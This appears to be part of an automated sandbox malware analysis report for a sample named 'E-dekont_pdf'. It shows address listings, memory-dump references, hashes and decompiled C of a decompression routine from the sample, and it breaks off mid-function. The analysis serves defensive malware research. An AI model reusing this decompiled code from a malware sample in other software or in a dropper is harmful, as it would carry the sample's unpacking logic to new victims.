                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407002

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                              • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_push("true");
									_pop(_t568);
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														__ebx = __edx + 1;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
